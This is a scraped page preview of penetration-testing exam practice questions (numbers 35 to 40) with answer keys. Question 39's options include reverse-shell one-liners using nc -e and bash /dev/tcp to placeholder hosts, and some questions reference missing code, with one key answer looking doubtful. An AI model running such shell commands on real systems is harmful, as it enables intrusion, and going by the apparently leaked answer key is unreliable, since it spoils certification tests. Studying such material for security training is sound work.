D Web server configurations may reveal sensitive information Correct Answer D

D web server configurations may reveal sensitive

This preview shows page 15 - 19 out of 31 pages.

D. Web server configurations may reveal sensitive information. Correct Answer: D Section: (none) Explanation Explanation/Reference: QUESTION 35 A penetration tester is in the process of writing a report that outlines the overall level of risk to operations. In which of the following areas of the report should the penetration tester put this? A. Appendices B. Executive summary C. Technical summary D. Main body Correct Answer: B Section: (none) Explanation Explanation/Reference: VCEConvert.com
QUESTION 36 A penetration tester is performing a black box assessment on a web-based banking application. The tester was only provided with a URL to the login page. Given the below code and output: Which of the following is the tester intending to do? A. Horizontally escalate privileges. B. Scrape the page for hidden fields. C. Analyze HTTP response code. D. Search for HTTP headers. Correct Answer: D Section: (none) Explanation Explanation/Reference: QUESTION 37 A penetration tester wants to launch a graphic console window from a remotely compromised host with IP 10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10. Which of the following would accomplish this task? A. From the remote computer, run the following commands: export XHOST 192.168.1.10:0.0 xhost+ Terminal B. From the local computer, run the following command: ssh -L4444:127.0.0.1:6000 -X [email protected] xterm C. From the remote computer, run the following command: ssh -R6000:127.0.0.1:4444 -p 6000 [email protected] “xhost+; xterm” D. From the local computer, run the following command: nc -l -p 6000 Then, from the remote computer, run the following command: xterm | nc 192.168.1.10 6000 Correct Answer: A VCEConvert.com
Section: (none) Explanation Explanation/Reference: QUESTION 38 A penetration tester is testing a banking application and uncovers a vulnerability. The tester is logged in as a non-privileged user who should have no access to any data. Given the data below from the web interception proxy: Which of the following types of vulnerabilities is being exploited? A. Forced browsing vulnerability B. Parameter pollution vulnerability C. File upload vulnerability D. Cookie enumeration Correct Answer: D Section: (none) Explanation Explanation/Reference: QUESTION 39 A penetration tester compromises a system that has unrestricted network access over port 443 to any host. The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of the following methods would the penetration tester MOST likely use? A. perl -e 'use SOCKET'; $i='<SOURCEIP>; $p='443; B. ssh [email protected]<DESTINATIONIP> -p 443 C. nc -e /bin/sh <SOURCEIP> 443 VCEConvert.com
D. bash -i >& /dev/tcp/<DESTINATIONIP>/443 0>&1 Correct Answer: D Section: (none) Explanation Explanation/Reference: Reference: QUESTION 40 A penetration tester observes that the content security policy header is missing during a web application penetration test. Which of the following techniques would the penetration tester MOST likely perform?

  • Left Quote Icon

    Student Picture

  • Left Quote Icon

    Student Picture

  • Left Quote Icon

    Student Picture